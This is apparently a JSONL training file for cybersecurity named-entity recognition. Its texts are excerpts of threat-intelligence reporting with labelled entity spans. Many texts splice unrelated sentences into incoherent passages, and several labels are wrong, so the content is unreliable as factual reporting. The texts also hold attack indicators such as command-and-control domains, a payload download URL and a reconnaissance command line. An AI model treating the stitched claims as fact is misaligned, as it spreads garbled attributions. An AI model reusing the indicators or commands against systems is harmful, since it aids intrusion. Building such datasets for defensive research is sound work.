199.250.250.99 ) . 
The new documentary , The Ashley Madison Affair , begins airing today on Hulu in the United States and on Disney+ in the United Kingdom .", "spans": {"MALWARE: XLoader": [[45, 52]], "THREAT_ACTOR: TG-0416": [[73, 80]], "THREAT_ACTOR: Advanced Persistent Threat": [[120, 146]], "THREAT_ACTOR: APT": [[149, 152]], "ORGANIZATION: technology": [[236, 246]], "ORGANIZATION: industrial": [[249, 259]], "ORGANIZATION: manufacturing": [[262, 275]], "ORGANIZATION: human rights groups": [[278, 297]], "ORGANIZATION: government": [[300, 310]], "ORGANIZATION: pharmaceutical": [[313, 327]], "ORGANIZATION: medical technology": [[334, 352]], "IP_ADDRESS: 199.250.250.99": [[476, 490]], "ORGANIZATION: The Ashley Madison Affair": [[517, 542]], "ORGANIZATION: Hulu": [[568, 572]], "ORGANIZATION: Disney+": [[601, 608]]}, "info": {"id": "cyberner_stix_train_004210", "source": "cyberner_stix_train"}} {"text": "TG-3390 : american.blackcmd.com .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "DOMAIN: american.blackcmd.com": [[10, 31]]}, "info": {"id": "cyberner_stix_train_004211", "source": "cyberner_stix_train"}} {"text": "Due to TrickMo ’ s persistence implementation mentioned earlier , this lockdown screen persists after a restart and is re-initiated every time the device becomes interactive . The ultimate goal of this threat is to mine Monero cryptocurrency in compromised Linux machines . Russia .", "spans": {"MALWARE: TrickMo": [[7, 14]]}, "info": {"id": "cyberner_stix_train_004212", "source": "cyberner_stix_train"}} {"text": "] ponethus [ . he Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . Aumlib , which for years has been used in targeted attacks , now encodes certain HTTP communications . 
Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": {"ORGANIZATION: Tibetan community": [[18, 35]], "TOOL: malware": [[105, 112]], "MALWARE: Aumlib": [[167, 173]], "ORGANIZATION: WordPress appears to be the top target": [[293, 331]]}, "info": {"id": "cyberner_stix_train_004213", "source": "cyberner_stix_train"}} {"text": "To get around this , the app then uses its root privilege to inject code into the Setup Wizard , extract the CAPTCHA image , and sends it to a remote server to try to solve the CAPTCHA . First , when a specific recipient was targeted , the mails often purported to be meeting invitations from established business partners . APT17 was embedding the encoded C2 IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a “ dead drop resolver. ” Encoding the IP address makes it more difficult to identify the true C2 address for network security professionals . 
We called this new malware ?", "spans": {"THREAT_ACTOR: APT17": [[325, 330]], "TOOL: C2": [[357, 359], [618, 620]], "MALWARE: BLACKCOFFEE": [[379, 390]], "ORGANIZATION: Microsoft": [[413, 422]], "TOOL: TechNet": [[423, 430]], "MALWARE: malware": [[685, 692]]}, "info": {"id": "cyberner_stix_train_004214", "source": "cyberner_stix_train"}} {"text": "The group is known for their advanced attacks that leverage custom-built Windows malware ( Kasperagent , Micropsia ) as well as Android malware ( Vamp , GnatSpy ) .", "spans": {"SYSTEM: Windows": [[73, 80]], "MALWARE: Kasperagent": [[91, 102]], "MALWARE: Micropsia": [[105, 114]], "SYSTEM: Android": [[128, 135]], "MALWARE: Vamp": [[146, 150]], "MALWARE: GnatSpy": [[153, 160]]}, "info": {"id": "cyberner_stix_train_004215", "source": "cyberner_stix_train"}} {"text": "Customers have to send a set text message from their phone to a specific bank number . Skipper , which has been linked to Turla in the past , was found alongside Gazer in most cases we investigated . Winnti : C&C : b[org_name].dnslookup.services : 443 . Organizations can collect this intelligence , review the threats described , consider if and how the threat is relevant to them , and the necessity of making any potential additional mitigations .", "spans": {"TOOL: Skipper": [[87, 94]], "TOOL: Gazer": [[162, 167]], "THREAT_ACTOR: Winnti": [[200, 206]], "TOOL: C&C": [[209, 212]], "URL: b[org_name].dnslookup.services": [[215, 245]], "ORGANIZATION: Organizations": [[254, 267]]}, "info": {"id": "cyberner_stix_train_004216", "source": "cyberner_stix_train"}} {"text": "The MQTT connection to broker The MQTT connection to broker The MQTT communication is used primarily to update the device state and get commands from the C & C . APT33 has shown particular interest in organizations in the aviation sector , as well as organizations in the energy sector with ties to petrochemical production . 
Remexi developers use the C programming language and GCC compiler on Windows in the MinGW . Cisco Duo provides multi - factor authentication for users to ensure only those authorized are accessing your network .", "spans": {"THREAT_ACTOR: APT33": [[162, 167]], "ORGANIZATION: aviation sector": [[222, 237]], "ORGANIZATION: energy sector": [[272, 285]], "ORGANIZATION: petrochemical": [[299, 312]], "MALWARE: Remexi": [[326, 332]], "TOOL: C": [[352, 353]], "TOOL: GCC": [[379, 382]], "SYSTEM: Windows": [[395, 402]], "TOOL: MinGW": [[410, 415]], "TOOL: Cisco Duo": [[418, 427]]}, "info": {"id": "cyberner_stix_train_004217", "source": "cyberner_stix_train"}} {"text": "The two weaponized documents we discovered leveraging DDE were of particular interest due to victimology and a change in tactics .", "spans": {}, "info": {"id": "cyberner_stix_train_004218", "source": "cyberner_stix_train"}} {"text": "Dump data from the IMO messenger app . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . Targeting Palestinians : The campaigns seems to target Palestinian individuals and entities , likely related to the Palestinian government . 
Harrison signed his threatening missive with the salutation , “ We are legion , ” suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers .", "spans": {"SYSTEM: messenger": [[23, 32]], "MALWARE: cmd.exe": [[119, 126]], "ORGANIZATION: Palestinian government": [[361, 383]], "THREAT_ACTOR: Harrison": [[386, 394]], "ORGANIZATION: Ashley Madison": [[525, 539]]}, "info": {"id": "cyberner_stix_train_004219", "source": "cyberner_stix_train"}} {"text": "While we don't know the motivations behind the attacks , the targeted commercial organizations , along with the targeted government organizations , may point in this direction .", "spans": {}, "info": {"id": "cyberner_stix_train_004220", "source": "cyberner_stix_train"}} {"text": "APT Targets Financial Analysts with CVE-2017-0199 .", "spans": {"VULNERABILITY: CVE-2017-0199": [[36, 49]]}, "info": {"id": "cyberner_stix_train_004221", "source": "cyberner_stix_train"}} {"text": "As a result , the Trojan delete button in the list of applications becomes inactive , which may cause problems for inexperienced users . the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated . Various network attack tools used to fingerprint and compromise other hosts on the network . 
The attacker also executed various Cobalt Strike components and tried to escalate privileges on the computer using PsExec .", "spans": {"VULNERABILITY: CVE-2013-5065": [[180, 193]], "VULNERABILITY: EoP exploit": [[194, 205]], "TOOL: Various network attack tools": [[231, 259]], "TOOL: Cobalt Strike": [[359, 372]], "TOOL: PsExec": [[439, 445]]}, "info": {"id": "cyberner_stix_train_004222", "source": "cyberner_stix_train"}} {"text": "The Proc1 function within the Module1 does nothing more than build the %APPDATA%\\MSDN\\~msdn.exe path to the dropped payload and executes it using the built-in Shell function .", "spans": {"FILEPATH: %APPDATA%\\MSDN\\~msdn.exe": [[71, 95]]}, "info": {"id": "cyberner_stix_train_004223", "source": "cyberner_stix_train"}} {"text": "] databit [ . The Mofang group has been active in relation to the Kyaukphyu sez . status.acmetoy.com /DD/ myScript.js or status.acmetoy.com /DD/ css.css . On March 2 , 2021 , Microsoft released a blog post that detailed multiple zero - day vulnerabilities used to attack on - premises versions of Microsoft Exchange Server .", "spans": {"THREAT_ACTOR: Mofang group": [[18, 30]], "URL: status.acmetoy.com": [[82, 100], [121, 139]], "FILEPATH: myScript.js": [[106, 117]], "FILEPATH: css.css": [[145, 152]], "ORGANIZATION: Microsoft": [[175, 184]], "VULNERABILITY: multiple zero - day vulnerabilities": [[220, 255]], "SYSTEM: Microsoft Exchange Server": [[297, 322]]}, "info": {"id": "cyberner_stix_train_004224", "source": "cyberner_stix_train"}} {"text": "HttpBrowser 's executable code may be obfuscated through structured exception handling and return-oriented programming .", "spans": {"MALWARE: HttpBrowser": [[0, 11]]}, "info": {"id": "cyberner_stix_train_004225", "source": "cyberner_stix_train"}} {"text": "Even though this individual ’s email id matched with the Pastebin id where base64 encoded malicious code was found , it is hard to say if this individual was or was not involved in this cyber attack .", "spans": {"TOOL: 
email": [[31, 36]], "TOOL: Pastebin": [[57, 65]]}, "info": {"id": "cyberner_stix_train_004226", "source": "cyberner_stix_train"}} {"text": "PLATINUM does not conduct its espionage activity to engage in direct financial gain , but instead uses stolen information for indirect economic advantages . In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker ; 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "ORGANIZATION: economic": [[135, 143]], "ORGANIZATION: Group-IB": [[167, 175]], "ORGANIZATION: banks": [[237, 242], [345, 350]], "ORGANIZATION: service provider": [[272, 288]], "ORGANIZATION: bank": [[305, 309]]}, "info": {"id": "cyberner_stix_train_004227", "source": "cyberner_stix_train"}} {"text": "These repackaged apps pose as communication , news , lifestyle , book , and reference apps popularly used in the Middle East . ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . The first one exploits the INCLUDEPICTURE feature of Microsoft Word to get context information about the victim’s computer , and the availability and version number of Microsoft Word . Kaspersky has more here .", "spans": {"THREAT_ACTOR: ScarCruft": [[127, 136]], "VULNERABILITY: Flash Player exploit": [[175, 195]], "VULNERABILITY: CVE-2016-4117": [[198, 211]], "TOOL: INCLUDEPICTURE": [[284, 298]], "ORGANIZATION: Microsoft": [[310, 319], [425, 434]], "TOOL: Word": [[320, 324], [435, 439]], "ORGANIZATION: Kaspersky": [[442, 451]]}, "info": {"id": "cyberner_stix_train_004228", "source": "cyberner_stix_train"}} {"text": "Its major functionality is also implemented through the call of the asynchronous task ( “ org.starsizew.i ” ) , including uploading the incoming SMS messages to the remote C2 server and executing any commands as instructed by the remote attacker . 
The executable variant of Helminth is installed with a dropper Trojan that we are tracking as the HerHer Trojan . Gamaredon cyberwarfare operations against Ukraine are still active . However , the self - proclaimed hacktivist group Anonymous Sudan appears to have increased KillNet ’s capabilities and the group has become the collective ’s most prolific affiliate in 2023 , conducting a majority of claimed DDoS attacks .", "spans": {"TOOL: Helminth": [[274, 282]], "TOOL: dropper Trojan": [[303, 317]], "TOOL: HerHer Trojan": [[346, 359]], "THREAT_ACTOR: Gamaredon": [[362, 371]], "THREAT_ACTOR: KillNet ’s capabilities": [[522, 545]], "THREAT_ACTOR: DDoS attacks": [[656, 668]]}, "info": {"id": "cyberner_stix_train_004229", "source": "cyberner_stix_train"}} {"text": "Sofacy Attacks Multiple Government Entities .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]]}, "info": {"id": "cyberner_stix_train_004230", "source": "cyberner_stix_train"}} {"text": "Instead , the actual content within the body of the websites was an exact match in each instance .", "spans": {}, "info": {"id": "cyberner_stix_train_004231", "source": "cyberner_stix_train"}} {"text": "To protect itself from being removed , Svpeng uses a previously unknown vulnerability in Android . Our analysis indicates this is a sophisticated multi-stage infection ; which begins with Epic Turla . For a complete list of tools please see the MainConnectionIo section . 
Minidionis – one more APT with a usage of cloud drives • Miniduke is back : Nemesis Gemina and the Botgen Studio More details about CozyDuke are available to customers of Kaspersky Intelligence Reporting .", "spans": {"MALWARE: Svpeng": [[39, 45]], "SYSTEM: Android": [[89, 96]], "TOOL: Epic Turla": [[188, 198]], "THREAT_ACTOR: Minidionis": [[272, 282]], "THREAT_ACTOR: Miniduke": [[329, 337]], "ORGANIZATION: Nemesis Gemina": [[348, 362]], "ORGANIZATION: Botgen Studio": [[371, 384]], "MALWARE: CozyDuke": [[404, 412]], "TOOL: Kaspersky Intelligence Reporting .": [[443, 477]]}, "info": {"id": "cyberner_stix_train_004232", "source": "cyberner_stix_train"}} {"text": "We speculate that the DLL type payload will be downloaded and call its Print export function for further infection .", "spans": {"TOOL: DLL": [[22, 25]]}, "info": {"id": "cyberner_stix_train_004233", "source": "cyberner_stix_train"}} {"text": "Shamoon2 : 2a0df97277ddb361cecf8726df6d78ac .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "FILEPATH: 2a0df97277ddb361cecf8726df6d78ac": [[11, 43]]}, "info": {"id": "cyberner_stix_train_004234", "source": "cyberner_stix_train"}} {"text": "The source process reads /proc/ [ pid ] /maps to find where libc is located in the target process memory . Like BlackEnergy ( a.k.a Sandworm , Quedagh ) , Potao is an example of targeted espionage ( APT ) malware detected mostly in Ukraine and a number of other CIS countries , including Russia , Georgia and Belarus . The attackers can also extend BLACKCOFFEE ’s functionality through additional commands sent as shellcode . 
Together with our partner CrySyS Lab , we ’ve discovered two new , previously - unknown infection mechanisms for Miniduke .", "spans": {"TOOL: BlackEnergy": [[112, 123]], "THREAT_ACTOR: Sandworm": [[132, 140]], "THREAT_ACTOR: Quedagh": [[143, 150]], "TOOL: Potao": [[155, 160]], "MALWARE: BLACKCOFFEE": [[349, 360]], "ORGANIZATION: CrySyS Lab": [[452, 462]], "MALWARE: Miniduke": [[539, 547]]}, "info": {"id": "cyberner_stix_train_004235", "source": "cyberner_stix_train"}} {"text": "The program creates the mutex “ mtx ” and an event named “ WerTyQ34C ” .", "spans": {}, "info": {"id": "cyberner_stix_train_004236", "source": "cyberner_stix_train"}} {"text": "We performed this comparison and found 28,881 servers that advertised a vulnerable version of SharePoint .", "spans": {"TOOL: SharePoint": [[94, 104]]}, "info": {"id": "cyberner_stix_train_004237", "source": "cyberner_stix_train"}} {"text": "It looks like its main purpose is to get into the system and execute downloaded files with root rights . Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen . The activity we have directly observed likely represents only a small fraction of the cyber espionage that APT1 has conducted . These new infection vectors rely on Java and IE vulnerabilities to infect the victim ’s PC .", "spans": {"ORGANIZATION: Kaspersky Lab": [[105, 118]], "TOOL: Octopus Trojan": [[139, 153]], "THREAT_ACTOR: APT1": [[291, 295]], "VULNERABILITY: Java and IE vulnerabilities": [[348, 375]], "ORGANIZATION: the victim ’s PC": [[386, 402]]}, "info": {"id": "cyberner_stix_train_004238", "source": "cyberner_stix_train"}} {"text": "The Cybereason Nocturnus team suspects that the malware operators and authors are Chinese speakers . The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . 
backdoors that now appear to be part of APT15 's toolset .", "spans": {"ORGANIZATION: Cybereason Nocturnus": [[4, 24]], "THREAT_ACTOR: FIN7": [[137, 141]], "ORGANIZATION: various companies": [[175, 192]], "ORGANIZATION: financial": [[210, 219]], "THREAT_ACTOR: APT15": [[289, 294]]}, "info": {"id": "cyberner_stix_train_004239", "source": "cyberner_stix_train"}} {"text": "In an attempt to hide the contents of the stolen data , the threat actor used winrar to compress and password-protect it . Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) .", "spans": {"THREAT_ACTOR: threat actor": [[60, 72]], "TOOL: winrar": [[78, 84]], "ORGANIZATION: Political entities": [[123, 141]], "THREAT_ACTOR: IndigoZebra": [[225, 236]], "THREAT_ACTOR: Sofacy": [[239, 245]], "MALWARE: Zebrocy": [[253, 260]], "MALWARE: malware": [[261, 268], [317, 324]], "MALWARE: Octopus": [[309, 316]]}, "info": {"id": "cyberner_stix_train_004240", "source": "cyberner_stix_train"}} {"text": "The PLATINUM group has written a few different versions of keyloggers that perform their functions in different ways , most likely to take advantage of different weaknesses in victims ' computing environments . Upon successful exploitation , the attachment will install the Trojan known as NetTraveler using a DLL side-loading attack technique .", "spans": {"THREAT_ACTOR: PLATINUM group": [[4, 18]], "TOOL: keyloggers": [[59, 69]], "FILEPATH: attachment": [[246, 256]], "MALWARE: Trojan": [[274, 280]], "MALWARE: NetTraveler": [[290, 301]], "FILEPATH: DLL side-loading": [[310, 326]]}, "info": {"id": "cyberner_stix_train_004241", "source": "cyberner_stix_train"}} {"text": "After the next run of the infected application , the “ boot ” module will run the “ patch ” module , which hooks the methods from known ad SDKs to its own implementation . 
The vast majority of systems communicating with Bookworm C2 servers are within the Bangkok metropolitan area where a majority of the government of Thailand exists . 3 、A password-protected ZIP archive ; They manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration .", "spans": {"TOOL: Bookworm": [[220, 228]], "ORGANIZATION: government": [[305, 315]]}, "info": {"id": "cyberner_stix_train_004242", "source": "cyberner_stix_train"}} {"text": "SIGHT Partners is still collecting information on the mechanics of the power outage and what role the KillDisk malware played in the greater event . The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions — often including military installations , intelligence agencies , and other government bodies .", "spans": {"ORGANIZATION: SIGHT Partners": [[0, 14]], "TOOL: KillDisk malware": [[102, 118]], "ORGANIZATION: Microsoft": [[181, 190]], "THREAT_ACTOR: groups": [[256, 262]], "THREAT_ACTOR: STRONTIUM": [[276, 285]], "THREAT_ACTOR: PLATINUM": [[290, 298]], "ORGANIZATION: specific individuals": [[396, 416]], "ORGANIZATION: institutions": [[421, 433]], "ORGANIZATION: military": [[452, 460]], "ORGANIZATION: intelligence agencies": [[477, 498]], "ORGANIZATION: government": [[511, 521]]}, "info": {"id": "cyberner_stix_train_004243", "source": "cyberner_stix_train"}} {"text": "Request encoding process The HTTP requests follow the format below , while on the WebSocket only the query data is written . IBM X-Force IRIS has gained insight into ITG08’s intrusion methods , ability to navigate laterally , use of custom and open-source tools , and typical persistence mechanisms . 
APT38 shares malware code and other development resources with TEMP.Hermit North Korean cyber espionage activity , although we consider APT38 .", "spans": {"ORGANIZATION: IBM X-Force IRIS": [[125, 141]], "THREAT_ACTOR: ITG08’s": [[166, 173]], "TOOL: tools": [[256, 261]], "THREAT_ACTOR: APT38": [[301, 306], [437, 442]], "THREAT_ACTOR: TEMP.Hermit": [[364, 375]]}, "info": {"id": "cyberner_stix_train_004244", "source": "cyberner_stix_train"}} {"text": "Changes in the second stage SPLM backdoor are refined , making the code reliably modular .", "spans": {"MALWARE: SPLM backdoor": [[28, 41]]}, "info": {"id": "cyberner_stix_train_004245", "source": "cyberner_stix_train"}} {"text": "] comlila-tournai [ . When activities targeting of civil society subsided , the actors instead appeared to have focused on external targets , such a series of attempts to spearphish the Danish Ministry of Foreign Affairs . Within these zones , we know of thousands of FQDNs that have resolved to hundreds of IP addresses ( which we suspect are hops ) and in some instances to APT1 ’s source IP addresses in Shanghai . Monitor for API calls that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: civil society": [[51, 64]], "TOOL: FQDNs": [[268, 273]], "THREAT_ACTOR: APT1": [[376, 380]]}, "info": {"id": "cyberner_stix_train_004246", "source": "cyberner_stix_train"}} {"text": "What is sure is that the gap in the Android banking malware rental business left open after the rental of the Anubis 2 and RedAlert 2 Trojans ended provides a good opportunity for the actors behind Cerberus to grow their business quickly . Machete has Latin American targets and has been developed by a Spanish-speaking group , presumably from a LATAM country . 
APT39 has prioritized the telecommunications sector , with additional targeting of the travel industry and IT firms that support it and the high-tech industry .", "spans": {"SYSTEM: Android": [[36, 43]], "MALWARE: Anubis 2": [[110, 118]], "MALWARE: RedAlert 2": [[123, 133]], "MALWARE: Cerberus": [[198, 206]], "THREAT_ACTOR: Machete": [[240, 247]], "THREAT_ACTOR: group": [[320, 325]], "THREAT_ACTOR: APT39": [[362, 367]], "ORGANIZATION: telecommunications sector": [[388, 413]], "ORGANIZATION: travel industry": [[449, 464]], "ORGANIZATION: IT firms": [[469, 477]], "ORGANIZATION: high-tech industry": [[502, 520]]}, "info": {"id": "cyberner_stix_train_004247", "source": "cyberner_stix_train"}} {"text": "The mitigation strategies provided may seem like common sense .", "spans": {}, "info": {"id": "cyberner_stix_train_004248", "source": "cyberner_stix_train"}} {"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . 
We’ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 .", "spans": {"TOOL: PIVY": [[0, 4], [266, 270]], "ORGANIZATION: government agencies": [[96, 115]], "ORGANIZATION: defense contractors": [[118, 137]], "THREAT_ACTOR: attackers": [[208, 217]], "VULNERABILITY: zero-day vulnerability": [[225, 247]], "THREAT_ACTOR: BalkanDoor": [[315, 325]], "VULNERABILITY: exploit": [[375, 382]], "TOOL: WinRAR": [[390, 396]], "VULNERABILITY: CVE-2018-20250": [[415, 429]]}, "info": {"id": "cyberner_stix_train_004249", "source": "cyberner_stix_train"}} {"text": "CTU researchers observed the first short links targeting hillaryclinton.com email addresses being created in mid-March 2016 ; the last link was created in mid-May .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "DOMAIN: hillaryclinton.com": [[57, 75]], "TOOL: email": [[76, 81]]}, "info": {"id": "cyberner_stix_train_004250", "source": "cyberner_stix_train"}} {"text": "The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin . In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company .", "spans": {"THREAT_ACTOR: group": [[96, 101]], "ORGANIZATION: Muslim activists": [[137, 153]], "THREAT_ACTOR: APT37": [[267, 272]], "ORGANIZATION: board member": [[339, 351]], "ORGANIZATION: financial company": [[372, 389]]}, "info": {"id": "cyberner_stix_train_004251", "source": "cyberner_stix_train"}} {"text": "After the profile is installed , the user will then be redirected to another Apple phishing site . 
On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website . The decoded data shows a command to be executed whoami&ipconfig /all on the victim . SysUpdate is exclusively used by Budworm .", "spans": {"ORGANIZATION: Apple": [[77, 82]], "THREAT_ACTOR: APT16": [[121, 126]], "ORGANIZATION: media": [[146, 151]], "THREAT_ACTOR: APT actors": [[172, 182]], "ORGANIZATION: government agency": [[209, 226]], "MALWARE: SysUpdate": [[454, 463]], "THREAT_ACTOR: Budworm": [[487, 494]]}, "info": {"id": "cyberner_stix_train_004252", "source": "cyberner_stix_train"}} {"text": "During the course of this investigation , we ensured that all certificates compromised by Suckfly were revoked and the affected companies notified .", "spans": {"THREAT_ACTOR: Suckfly": [[90, 97]]}, "info": {"id": "cyberner_stix_train_004253", "source": "cyberner_stix_train"}} {"text": "The attached document contains a conference agenda that the Sofacy group appears to have copied directly from the website for the “ Underwater Defence & Security 2018 Conference ” here .", "spans": {"THREAT_ACTOR: Sofacy": [[60, 66]]}, "info": {"id": "cyberner_stix_train_004254", "source": "cyberner_stix_train"}} {"text": "For sample “ 538ff577a80748d87b5e738e95c8edd2bd54ea406fe3a75bf452714b17528a87 ” the following is an excerpt from the VBA macro building the PowerShell command .", "spans": {"FILEPATH: 538ff577a80748d87b5e738e95c8edd2bd54ea406fe3a75bf452714b17528a87": [[13, 77]], "TOOL: VBA macro": [[117, 126]], "TOOL: PowerShell": [[140, 150]]}, "info": {"id": "cyberner_stix_train_004255", "source": "cyberner_stix_train"}} {"text": "After this announcement , the Palestinian Authority cut salaries for its employees in Gaza by 30 percent and informed Israel that it would no longer pay for electricity provided to Gaza 
causing blackouts throughout the area and escalating tensions between the rival groups .", "spans": {"ORGANIZATION: Palestinian Authority": [[30, 51]]}, "info": {"id": "cyberner_stix_train_004256", "source": "cyberner_stix_train"}} {"text": "A full list of targeted applications is included in the IOC section at the end of this post . Aside from the four companies which have publicly acknowledged attacks , Symantec has identified five other large technology firms compromised by Butterfly , primarily headquartered in the US . It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7 . The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": {"ORGANIZATION: Symantec": [[167, 175]], "ORGANIZATION: technology firms": [[208, 224]], "THREAT_ACTOR: FIN7": [[424, 428]], "MALWARE: FakeSG": [[464, 470]], "SYSTEM: hacked WordPress websites": [[488, 513]]}, "info": {"id": "cyberner_stix_train_004257", "source": "cyberner_stix_train"}} {"text": "Our solution is to :", "spans": {}, "info": {"id": "cyberner_stix_train_004258", "source": "cyberner_stix_train"}} {"text": "do.jar ( SHA256 : a711e620246d9954510d3f1c8d5c784bacc78069a5c57b9ec09c3e234bc33a8b ) : The decrypted file that was created by “ start.ogg. ” It sends a request to the server with the device ’ s configuration . PittyTiger could also use CVE-2014-1761 , which is more recent . An additional campaign has also been observed targeting Japanese entities .", "spans": {"THREAT_ACTOR: PittyTiger": [[210, 220]], "VULNERABILITY: CVE-2014-1761": [[236, 249]]}, "info": {"id": "cyberner_stix_train_004259", "source": "cyberner_stix_train"}} {"text": "A current round of cyber-attacks from Chinese source groups are targeting the maritime sector in an attempt to steal technology . 
In comparison , XENOTIME was defined based on principles of infrastructure ( compromised third-party infrastructure and various networks associated with several Russian research institutions ) , capabilities ( publicly- and commercially-available tools with varying levels of customization ) and targeting ( an issue not meant for discussion in this blog ) .", "spans": {"ORGANIZATION: maritime sector": [[78, 93]], "THREAT_ACTOR: XENOTIME": [[146, 154]], "ORGANIZATION: research institutions": [[299, 320]]}, "info": {"id": "cyberner_stix_train_004260", "source": "cyberner_stix_train"}} {"text": "READ_EXTERNAL_STORAGE - read from external storage . The installed EXE file is almost exactly the same as the DLL version of Bisonal variant used against the Russian organization . In addition , we observed a TTP shift post publication with regards to their malware delivery ; they started using compromised but legitimate domains to serve their malware .", "spans": {"MALWARE: installed EXE file": [[57, 75]], "MALWARE: Bisonal variant": [[125, 140]], "MALWARE: legitimate domains": [[312, 330]]}, "info": {"id": "cyberner_stix_train_004261", "source": "cyberner_stix_train"}} {"text": "Every device with Google Play includes Google Play Protect and all apps on Google Play are automatically and periodically scanned by our solutions . The PassCV group continues to be extremely effective in compromising both small and large game companies and surreptitiously using their code-signing certificates to infect an even larger swath of organizations . Many threat groups use lateral movement techniques , but this engagement allowed CTU analysts to not only further validate indicators of lateral movement , but also to look a bit closer at those indicators and expand the cluster of indicators surrounding the use of at.exe for lateral movement within the infrastructure . 
It uses a vulnerability discovered at the end December 2012 , CVE-2012 - 4792 .", "spans": {"SYSTEM: Google Play": [[18, 29], [75, 86]], "SYSTEM: Google Play Protect": [[39, 58]], "THREAT_ACTOR: PassCV": [[153, 159]], "ORGANIZATION: game companies": [[239, 253]], "ORGANIZATION: CTU": [[443, 446]], "FILEPATH: at.exe": [[628, 634]], "VULNERABILITY: CVE-2012 - 4792": [[746, 761]]}, "info": {"id": "cyberner_stix_train_004262", "source": "cyberner_stix_train"}} {"text": "Text message and call logs were transmitted every 72 hours to the Shanghai server , and once a day for other personally identifiable data , the company says . In early 2018 , Rapid7 identified that APT10 compromised an apparel company , based upon detections and intelligence gathered from the U.S.-based law firm breach . Tick was spotted last year , but they are actively and silently attacking various organizations in South Korea and Japan for a number of years .", "spans": {"ORGANIZATION: Rapid7": [[175, 181]], "THREAT_ACTOR: APT10": [[198, 203]], "ORGANIZATION: apparel company": [[219, 234]], "ORGANIZATION: law firm": [[305, 313]], "THREAT_ACTOR: Tick": [[323, 327]]}, "info": {"id": "cyberner_stix_train_004263", "source": "cyberner_stix_train"}} {"text": "Other than that , its major functionality is to collect private device information , upload it to a remote C2 server , and handle any commands as requested by the C2 server . In May 2016 , Unit 42 began researching attacks that used spear-phishing emails with attachments , specifically malicious Excel spreadsheets sent to financial organizations within Saudi Arabia . The script will check the presence of the “ IndexOffice.exe ” artifact : if true then it will delete it and it will download a new file/script from “ http://masseffect.space/_/post.php ” . 
To date , the ransomware has only been used in a limited fashion .", "spans": {"ORGANIZATION: Unit 42": [[189, 196]], "ORGANIZATION: financial organizations": [[324, 347]], "FILEPATH: IndexOffice.exe": [[414, 428]], "URL: http://masseffect.space/_/post.php": [[518, 575]], "MALWARE: ransomware": [[594, 604]]}, "info": {"id": "cyberner_stix_train_004264", "source": "cyberner_stix_train"}} {"text": "Super Mario Run Malware # 2 – DroidJack RAT Gamers love Mario and Pokemon , but so do malware authors . The admin@338 has largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . From April 19-24 , 2017 , a politically-motivated , targeted campaign was carried out against numerous Israeli organizations . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to •", "spans": {"MALWARE: Super Mario Run Malware": [[0, 23]], "MALWARE: DroidJack RAT": [[30, 43]], "SYSTEM: Mario": [[56, 61]], "SYSTEM: Pokemon": [[66, 73]], "THREAT_ACTOR: admin@338": [[108, 117]], "ORGANIZATION: organizations": [[139, 152]], "ORGANIZATION: financial , economic and trade policy": [[165, 202]], "TOOL: publicly available RATs": [[221, 244]], "TOOL: Poison Ivy": [[253, 263]], "TOOL: non-public backdoors": [[279, 299]], "ORGANIZATION: Microsoft": [[514, 523]]}, "info": {"id": "cyberner_stix_train_004265", "source": "cyberner_stix_train"}} {"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . 
